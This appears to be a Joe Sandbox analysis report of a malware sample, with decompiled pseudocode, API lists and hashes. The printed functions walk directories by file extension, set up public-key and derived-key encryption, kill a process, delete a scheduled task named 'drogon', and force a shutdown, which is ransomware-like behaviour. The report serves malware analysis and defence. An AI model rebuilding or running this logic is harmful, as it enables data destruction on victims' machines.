                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Crypt$Hash$Local$CreateDestroy$ContextFreeObject$AcquireAllocBinaryCloseCombineDataDecodeHandlePathStringWait$DeriveErrorEventFileFindFirstImportInfoLastMultipleObjectsParamPublicReleaseSingleThread
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2692407486-0
                                                                                                                                                              • Opcode ID: 8af36ebea5e10eaba54ac3495589cc3942663fdffcd7bbcdafee89dca0d2d036
                                                                                                                                                              • Instruction ID: 5e486e518c4999da4a164e771b403eb9cbb8b374b08c2f780df3c97e8bf29cb2
                                                                                                                                                              • Opcode Fuzzy Hash: 8af36ebea5e10eaba54ac3495589cc3942663fdffcd7bbcdafee89dca0d2d036
                                                                                                                                                              • Instruction Fuzzy Hash: 07216272100624AFF7316B71EF88DAB7BADFF48359B042529F642C1464DB66FC418B20
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 04E25636
                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,00000000), ref: 04E2564C
                                                                                                                                                              • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 04E25662
                                                                                                                                                              • CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 04E25682
                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 04E2568D
                                                                                                                                                              • CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 04E256A6
                                                                                                                                                              • CryptImportPublicKeyInfo.CRYPT32(?,00000001,00000000,?), ref: 04E256B5
                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 04E256BF
                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 04E256C8
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Crypt$Local$AllocBinaryDecodeFreeObjectString$ImportInfoPublic
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3940947887-0
                                                                                                                                                              • Opcode ID: 0538a0dea8d8f58d123bdf56c47b9689b48e52df1a473aea3376b82d29127eea
                                                                                                                                                              • Instruction ID: 8a5eb705c84135b48fc829ab06aa06670542ef02825fbbcfb7a9fddca61a1cba
                                                                                                                                                              • Opcode Fuzzy Hash: 0538a0dea8d8f58d123bdf56c47b9689b48e52df1a473aea3376b82d29127eea
                                                                                                                                                              • Instruction Fuzzy Hash: 81214C71501228BEDB219F929E48EDFBF7DEF09795F008011BA08A6094D6729B00DFA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                              			E04E25E9F(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                              				short _v524;
                                                                                                                                                              				short _v532;
                                                                                                                                                              				short _v1052;
                                                                                                                                                              				short _v1060;
                                                                                                                                                              				struct _WIN32_FIND_DATAW _v1644;
                                                                                                                                                              				void* _v1648;
                                                                                                                                                              				signed int _v1652;
                                                                                                                                                              				int _t44;
                                                                                                                                                              				long _t52;
                                                                                                                                                              				intOrPtr* _t53;
                                                                                                                                                              				int _t55;
                                                                                                                                                              				intOrPtr* _t56;
                                                                                                                                                              				WCHAR* _t61;
                                                                                                                                                              				void* _t62;
                                                                                                                                                              				WCHAR** _t69;
                                                                                                                                                              				intOrPtr* _t73;
                                                                                                                                                              				intOrPtr* _t74;
                                                                                                                                                              				intOrPtr* _t75;
                                                                                                                                                              				intOrPtr _t79;
                                                                                                                                                              				intOrPtr _t80;
                                                                                                                                                              				void* _t81;
                                                                                                                                                              				intOrPtr _t82;
                                                                                                                                                              				intOrPtr _t83;
                                                                                                                                                              				intOrPtr _t89;
                                                                                                                                                              				signed int _t90;
                                                                                                                                                              				signed int _t91;
                                                                                                                                                              				void* _t93;
                                                                                                                                                              				WCHAR* _t114;
                                                                                                                                                              
                                                                                                                                                              				_t93 = (_t91 & 0xfffffff8) - 0x668;
                                                                                                                                                              				if(_a8 == 0) {
                                                                                                                                                              					L39:
                                                                                                                                                              					return _t44;
                                                                                                                                                              				}
                                                                                                                                                              				_t44 = PathCombineW( &_v524, _a4, "*");
                                                                                                                                                              				if(_t44 == 0) {
                                                                                                                                                              					goto L39;
                                                                                                                                                              				}
                                                                                                                                                              				_t44 = FindFirstFileW( &_v532,  &_v1644); // executed
                                                                                                                                                              				_v1648 = _t44;
                                                                                                                                                              				if(_t44 == 0xffffffff) {
                                                                                                                                                              					goto L39;
                                                                                                                                                              				} else {
                                                                                                                                                              					goto L3;
                                                                                                                                                              				}
                                                                                                                                                              				while(1) {
                                                                                                                                                              					L3:
                                                                                                                                                              					_t52 = WaitForMultipleObjects((0 |  *((intOrPtr*)(_a12 + 0x4c)) != 0x00000000) + 1, _a12 + 0x48, 0, 0);
                                                                                                                                                              					if(_t52 == 0 || _t52 == 1 || _t52 == 0xffffffff) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					_t73 = ".";
                                                                                                                                                              					_t53 =  &(_v1644.cFileName);
                                                                                                                                                              					while(1) {
                                                                                                                                                              						_t79 =  *_t53;
                                                                                                                                                              						if(_t79 !=  *_t73) {
                                                                                                                                                              							break;
                                                                                                                                                              						}
                                                                                                                                                              						if(_t79 == 0) {
                                                                                                                                                              							L11:
                                                                                                                                                              							_t53 = 0;
                                                                                                                                                              							L13:
                                                                                                                                                              							if(_t53 == 0) {
                                                                                                                                                              								L37:
                                                                                                                                                              								_t55 = FindNextFileW(_v1648,  &_v1644); // executed
                                                                                                                                                              								if(_t55 != 0) {
                                                                                                                                                              									goto L3;
                                                                                                                                                              								}
                                                                                                                                                              								goto L38;
                                                                                                                                                              							}
                                                                                                                                                              							_t74 = L"..";
                                                                                                                                                              							_t56 =  &(_v1644.cFileName);
                                                                                                                                                              							while(1) {
                                                                                                                                                              								_t80 =  *_t56;
                                                                                                                                                              								if(_t80 !=  *_t74) {
                                                                                                                                                              									break;
                                                                                                                                                              								}
                                                                                                                                                              								if(_t80 == 0) {
                                                                                                                                                              									L19:
                                                                                                                                                              									_t56 = 0;
                                                                                                                                                              									L21:
                                                                                                                                                              									if(_t56 != 0 && PathCombineW( &_v1052, _a4,  &(_v1644.cFileName)) != 0) {
                                                                                                                                                              										if((_v1652 & 0x00000010) == 0 || (_v1652 & 0x00000400) != 0) {
                                                                                                                                                              											_t61 = PathFindExtensionW( &(_v1644.dwReserved0));
                                                                                                                                                              											_t75 =  &(_v1644.dwReserved0);
                                                                                                                                                              											_t81 = _t75 + 2;
                                                                                                                                                              											do {
                                                                                                                                                              												_t89 =  *_t75;
                                                                                                                                                              												_t75 = _t75 + 2;
                                                                                                                                                              											} while (_t89 != 0);
                                                                                                                                                              											if(_t61 == _t93 + 0x3c + (_t75 - _t81 >> 1) * 2) {
                                                                                                                                                              												_t62 = 0;
                                                                                                                                                              											} else {
                                                                                                                                                              												_t62 = E04E259B1(_t61);
                                                                                                                                                              											}
                                                                                                                                                              											if(_t62 != 0) {
                                                                                                                                                              												E04E25D0A(_t81,  &_v1060, _a12); // executed
                                                                                                                                                              											}
                                                                                                                                                              										} else {
                                                                                                                                                              											_t90 = 0;
                                                                                                                                                              											_t114 =  *0x4e33014; // 0x4e31528
                                                                                                                                                              											if(_t114 == 0) {
                                                                                                                                                              												L29:
                                                                                                                                                              												E04E25E9F( &_v1060, _a8 - 1, _a12); // executed
                                                                                                                                                              												goto L37;
                                                                                                                                                              											}
                                                                                                                                                              											_t69 = 0x4e33014;
                                                                                                                                                              											while(StrStrIW( &_v1060,  *_t69) == 0) {
                                                                                                                                                              												_t90 = _t90 + 1;
                                                                                                                                                              												_t69 =  &(0x4e33014[_t90]);
                                                                                                                                                              												if( *_t69 != 0) {
                                                                                                                                                              													continue;
                                                                                                                                                              												}
                                                                                                                                                              												goto L29;
                                                                                                                                                              											}
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              									goto L37;
                                                                                                                                                              								}
                                                                                                                                                              								_t82 =  *((intOrPtr*)(_t56 + 2));
                                                                                                                                                              								_t17 = _t74 + 2; // 0x2e
                                                                                                                                                              								if(_t82 !=  *_t17) {
                                                                                                                                                              									break;
                                                                                                                                                              								}
                                                                                                                                                              								_t56 = _t56 + 4;
                                                                                                                                                              								_t74 = _t74 + 4;
                                                                                                                                                              								if(_t82 != 0) {
                                                                                                                                                              									continue;
                                                                                                                                                              								}
                                                                                                                                                              								goto L19;
                                                                                                                                                              							}
                                                                                                                                                              							asm("sbb eax, eax");
                                                                                                                                                              							asm("sbb eax, 0xffffffff");
                                                                                                                                                              							goto L21;
                                                                                                                                                              						}
                                                                                                                                                              						_t83 =  *((intOrPtr*)(_t53 + 2));
                                                                                                                                                              						_t14 = _t73 + 2; // 0x650000
                                                                                                                                                              						if(_t83 !=  *_t14) {
                                                                                                                                                              							break;
                                                                                                                                                              						}
                                                                                                                                                              						_t53 = _t53 + 4;
                                                                                                                                                              						_t73 = _t73 + 4;
                                                                                                                                                              						if(_t83 != 0) {
                                                                                                                                                              							continue;
                                                                                                                                                              						}
                                                                                                                                                              						goto L11;
                                                                                                                                                              					}
                                                                                                                                                              					asm("sbb eax, eax");
                                                                                                                                                              					asm("sbb eax, 0xffffffff");
                                                                                                                                                              					goto L13;
                                                                                                                                                              				}
                                                                                                                                                              				L38:
                                                                                                                                                              				_t44 = FindClose(_v1648);
                                                                                                                                                              				goto L39;
                                                                                                                                                              			}































                                                                                                                                                              0x04e25ea5
                                                                                                                                                              0x04e25eb2
                                                                                                                                                              0x04e2607d
                                                                                                                                                              0x04e26082
                                                                                                                                                              0x04e26082
                                                                                                                                                              0x04e25ec8
                                                                                                                                                              0x04e25ed0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e25ee3
                                                                                                                                                              0x04e25ee9
                                                                                                                                                              0x04e25ef0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e25ef6
                                                                                                                                                              0x04e25ef6
                                                                                                                                                              0x04e25f09
                                                                                                                                                              0x04e25f11
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e25f29
                                                                                                                                                              0x04e25f2e
                                                                                                                                                              0x04e25f32
                                                                                                                                                              0x04e25f32
                                                                                                                                                              0x04e25f38
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e25f3d
                                                                                                                                                              0x04e25f54
                                                                                                                                                              0x04e25f54
                                                                                                                                                              0x04e25f5d
                                                                                                                                                              0x04e25f5f
                                                                                                                                                              0x04e2605c
                                                                                                                                                              0x04e26065
                                                                                                                                                              0x04e2606d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2606d
                                                                                                                                                              0x04e25f65
                                                                                                                                                              0x04e25f6a
                                                                                                                                                              0x04e25f6e
                                                                                                                                                              0x04e25f6e
                                                                                                                                                              0x04e25f74
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e25f79
                                                                                                                                                              0x04e25f90
                                                                                                                                                              0x04e25f90
                                                                                                                                                              0x04e25f99
                                                                                                                                                              0x04e25f9b
                                                                                                                                                              0x04e25fc4
                                                                                                                                                              0x04e2601b
                                                                                                                                                              0x04e26021
                                                                                                                                                              0x04e26025
                                                                                                                                                              0x04e26028
                                                                                                                                                              0x04e26028
                                                                                                                                                              0x04e2602b
                                                                                                                                                              0x04e2602e
                                                                                                                                                              0x04e2603d
                                                                                                                                                              0x04e26046
                                                                                                                                                              0x04e2603f
                                                                                                                                                              0x04e2603f
                                                                                                                                                              0x04e2603f
                                                                                                                                                              0x04e2604a
                                                                                                                                                              0x04e26057
                                                                                                                                                              0x04e26057
                                                                                                                                                              0x04e25fd0
                                                                                                                                                              0x04e25fd0
                                                                                                                                                              0x04e25fd2
                                                                                                                                                              0x04e25fd8
                                                                                                                                                              0x04e25fff
                                                                                                                                                              0x04e2600f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2600f
                                                                                                                                                              0x04e25fda
                                                                                                                                                              0x04e25fdf
                                                                                                                                                              0x04e25ff3
                                                                                                                                                              0x04e25ff4
                                                                                                                                                              0x04e25ffd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e25ffd
                                                                                                                                                              0x04e25fdf
                                                                                                                                                              0x04e25fc4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e25f9b
                                                                                                                                                              0x04e25f7b
                                                                                                                                                              0x04e25f7f
                                                                                                                                                              0x04e25f83
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e25f85
                                                                                                                                                              0x04e25f88
                                                                                                                                                              0x04e25f8e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e25f8e
                                                                                                                                                              0x04e25f94
                                                                                                                                                              0x04e25f96
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e25f96
                                                                                                                                                              0x04e25f3f
                                                                                                                                                              0x04e25f43
                                                                                                                                                              0x04e25f47
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e25f49
                                                                                                                                                              0x04e25f4c
                                                                                                                                                              0x04e25f52
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e25f52
                                                                                                                                                              0x04e25f58
                                                                                                                                                              0x04e25f5a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e25f5a
                                                                                                                                                              0x04e26073
                                                                                                                                                              0x04e26077
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • PathCombineW.SHLWAPI(?,?,04E31554,?,?), ref: 04E25EC8
                                                                                                                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 04E25EE3
                                                                                                                                                              • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 04E25F09
                                                                                                                                                              • PathCombineW.SHLWAPI(?,?,?), ref: 04E25FB1
                                                                                                                                                              • StrStrIW.SHLWAPI(?,04E33014), ref: 04E25FE9
                                                                                                                                                              • PathFindExtensionW.SHLWAPI(?), ref: 04E2601B
                                                                                                                                                              • FindNextFileW.KERNELBASE(?,?), ref: 04E26065
                                                                                                                                                              • FindClose.KERNEL32(?), ref: 04E26077
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Find$Path$CombineFile$CloseExtensionFirstMultipleNextObjectsWait
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1251538951-0
                                                                                                                                                              • Opcode ID: 443e128598483c2c0452ba6771b540c51705edc50ebe9871fb8b9db3b9ead55a
                                                                                                                                                              • Instruction ID: ed3069b902f00c7c77b39eac73fd1e86c03d758087b1e6039043efa5de530eda
                                                                                                                                                              • Opcode Fuzzy Hash: 443e128598483c2c0452ba6771b540c51705edc50ebe9871fb8b9db3b9ead55a
                                                                                                                                                              • Instruction Fuzzy Hash: 1751E132104215EFEB31DF34CF48DAAB3AAFB80729F545B19E552C6094E732E545DB41
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                              			E04E28A23() {
                                                                                                                                                              				void* _t4;
                                                                                                                                                              
                                                                                                                                                              				_t4 = E04E2808E(); // executed
                                                                                                                                                              				if(( *0x4e37bc0 & 0x00000002) != 0) {
                                                                                                                                                              					_t4 = E04E27FB7(L"schtasks /Delete /F /TN drogon", 0); // executed
                                                                                                                                                              				}
                                                                                                                                                              				if(( *0x4e37bc0 & 0x00000001) != 0) {
                                                                                                                                                              					__imp__InitiateSystemShutdownExW(0, 0, 0, 1, 1, 0x80000000); // executed
                                                                                                                                                              					if(_t4 == 0) {
                                                                                                                                                              						ExitWindowsEx(6, 0); // executed
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				ExitProcess(0);
                                                                                                                                                              			}




                                                                                                                                                              0x04e28a24
                                                                                                                                                              0x04e28a32
                                                                                                                                                              0x04e28a3a
                                                                                                                                                              0x04e28a3a
                                                                                                                                                              0x04e28a46
                                                                                                                                                              0x04e28a54
                                                                                                                                                              0x04e28a5c
                                                                                                                                                              0x04e28a61
                                                                                                                                                              0x04e28a61
                                                                                                                                                              0x04e28a5c
                                                                                                                                                              0x04e28a68

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 04E2808E: wsprintfW.USER32 ref: 04E280BC
                                                                                                                                                                • Part of subcall function 04E2808E: wsprintfW.USER32 ref: 04E280CC
                                                                                                                                                                • Part of subcall function 04E2808E: wsprintfW.USER32 ref: 04E280DC
                                                                                                                                                                • Part of subcall function 04E2808E: wsprintfW.USER32 ref: 04E280EC
                                                                                                                                                                • Part of subcall function 04E2808E: wsprintfW.USER32 ref: 04E28126
                                                                                                                                                              • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000001,80000000), ref: 04E28A54
                                                                                                                                                              • ExitWindowsEx.USER32(00000006,00000000), ref: 04E28A61
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 04E28A68
                                                                                                                                                                • Part of subcall function 04E27FB7: wsprintfW.USER32 ref: 04E27FD6
                                                                                                                                                                • Part of subcall function 04E27FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 04E27FFA
                                                                                                                                                                • Part of subcall function 04E27FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04E2800C
                                                                                                                                                                • Part of subcall function 04E27FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 04E28022
                                                                                                                                                                • Part of subcall function 04E27FB7: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04E28069
                                                                                                                                                                • Part of subcall function 04E27FB7: Sleep.KERNELBASE(00000000), ref: 04E2807F
                                                                                                                                                              Strings
                                                                                                                                                              • schtasks /Delete /F /TN drogon, xrefs: 04E28A35
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: wsprintf$ExitProcessSystem$CreateDirectoryEnvironmentInitiateShutdownSleepVariableWindowslstrcat
                                                                                                                                                              • String ID: schtasks /Delete /F /TN drogon
                                                                                                                                                              • API String ID: 3579268615-951750757
                                                                                                                                                              • Opcode ID: a3b7b0a304b109f2d0b727cdb25240e443ff9b57d34f1d4785d14273edb67f26
                                                                                                                                                              • Instruction ID: d635af35971eddd2e7849dfce34fe0584a441133461f8bc53c362f096534a7d1
                                                                                                                                                              • Opcode Fuzzy Hash: a3b7b0a304b109f2d0b727cdb25240e443ff9b57d34f1d4785d14273edb67f26
                                                                                                                                                              • Instruction Fuzzy Hash: 62E04F6015223575F63267226E0DFDB3D5AFF0275AF045304FA89600888BDA5941C1B5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,?,00000000,?,?,?,04E262E0,?,?,?,?), ref: 04E260A6
                                                                                                                                                              • CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,?,04E262E0,?,?,?,?), ref: 04E260BA
                                                                                                                                                              • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000001,?,?,?,?,04E262E0,?,?,?,?), ref: 04E260D3
                                                                                                                                                              • CryptDestroyHash.ADVAPI32(?,?,?,?,04E262E0,?,?,?,?), ref: 04E260DF
                                                                                                                                                                • Part of subcall function 04E2559B: CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000,?,?,00000000), ref: 04E255BC
                                                                                                                                                                • Part of subcall function 04E2559B: CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000), ref: 04E255CB
                                                                                                                                                                • Part of subcall function 04E2559B: CryptGetKeyParam.ADVAPI32(?,00000001,00000000,?,00000000), ref: 04E255DA
                                                                                                                                                                • Part of subcall function 04E2559B: LocalAlloc.KERNEL32(00000040,?), ref: 04E255EE
                                                                                                                                                                • Part of subcall function 04E2559B: CryptSetKeyParam.ADVAPI32(?,00000001,00000000,00000000), ref: 04E25601
                                                                                                                                                                • Part of subcall function 04E2559B: LocalFree.KERNEL32(?), ref: 04E25606
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Crypt$Param$Hash$Local$AllocCreateDataDeriveDestroyFree
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 797921460-0
                                                                                                                                                              • Opcode ID: eec4d996526ab39e7145230a9a57c9495c0939a63ef2b40ebf765fc15a1247b0
                                                                                                                                                              • Instruction ID: b7aa7ac8f0e8369ae1ca841371e392f232140176fa2f5883accb6da45d109e0f
                                                                                                                                                              • Opcode Fuzzy Hash: eec4d996526ab39e7145230a9a57c9495c0939a63ef2b40ebf765fc15a1247b0
                                                                                                                                                              • Instruction Fuzzy Hash: 23015271900118FFEB208FA5DE84DAFBBBDEB04755B100469F201E6150DA729E409B10
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 91%
                                                                                                                                                              			E04E284EE() {
                                                                                                                                                              				char _v524;
                                                                                                                                                              				int _v552;
                                                                                                                                                              				void* _v560;
                                                                                                                                                              				void* _t6;
                                                                                                                                                              				int _t8;
                                                                                                                                                              				int _t12;
                                                                                                                                                              				void* _t14;
                                                                                                                                                              
                                                                                                                                                              				_t6 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                                                                                              				_t14 = _t6;
                                                                                                                                                              				if(_t14 != 0xffffffff) {
                                                                                                                                                              					_push( &_v560);
                                                                                                                                                              					_v560 = 0x22c;
                                                                                                                                                              					_t8 = Process32FirstW(_t14); // executed
                                                                                                                                                              					while(_t8 != 0) {
                                                                                                                                                              						if(E04E282EE( &_v524) == 0xf4713b0e) {
                                                                                                                                                              							E04E2841D(_v552);
                                                                                                                                                              							L7:
                                                                                                                                                              							_t12 = FindCloseChangeNotification(_t14); // executed
                                                                                                                                                              							return _t12;
                                                                                                                                                              						}
                                                                                                                                                              						_t8 = Process32NextW(_t14,  &_v560); // executed
                                                                                                                                                              					}
                                                                                                                                                              					goto L7;
                                                                                                                                                              				}
                                                                                                                                                              				return _t6;
                                                                                                                                                              			}










                                                                                                                                                              0x04e284fc
                                                                                                                                                              0x04e28502
                                                                                                                                                              0x04e28507
                                                                                                                                                              0x04e2850f
                                                                                                                                                              0x04e28511
                                                                                                                                                              0x04e2851b
                                                                                                                                                              0x04e28544
                                                                                                                                                              0x04e28534
                                                                                                                                                              0x04e28550
                                                                                                                                                              0x04e28555
                                                                                                                                                              0x04e28556
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e28556
                                                                                                                                                              0x04e2853e
                                                                                                                                                              0x04e2853e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e28548
                                                                                                                                                              0x04e2855e

                                                                                                                                                              APIs
                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04E284FC
                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 04E2851B
                                                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 04E2853E
                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 04E28556
                                                                                                                                                                • Part of subcall function 04E2841D: GetCurrentProcessId.KERNEL32(?,04E28555,?,?), ref: 04E28430
                                                                                                                                                                • Part of subcall function 04E2841D: OpenProcess.KERNEL32(00000401,00000000,?,?,?,?,04E28555,?,?), ref: 04E2844C
                                                                                                                                                                • Part of subcall function 04E2841D: OpenProcessToken.ADVAPI32(00000000,0000000E,?,00000000,?,?,?,04E28555,?,?), ref: 04E28464
                                                                                                                                                                • Part of subcall function 04E2841D: DuplicateToken.ADVAPI32(?,00000002,?,?,?,?,04E28555,?,?), ref: 04E2847D
                                                                                                                                                                • Part of subcall function 04E2841D: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 04E284A3
                                                                                                                                                                • Part of subcall function 04E2841D: CheckTokenMembership.ADVAPI32(?,?,?), ref: 04E284BA
                                                                                                                                                                • Part of subcall function 04E2841D: TerminateProcess.KERNEL32(00000000,00000000), ref: 04E284CB
                                                                                                                                                                • Part of subcall function 04E2841D: FreeSid.ADVAPI32(?), ref: 04E284D4
                                                                                                                                                                • Part of subcall function 04E2841D: CloseHandle.KERNEL32(?), ref: 04E284DD
                                                                                                                                                                • Part of subcall function 04E2841D: CloseHandle.KERNEL32(?,?,?,?,04E28555,?,?), ref: 04E284E2
                                                                                                                                                                • Part of subcall function 04E2841D: CloseHandle.KERNEL32(00000000,?,?,?,04E28555,?,?), ref: 04E284E5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
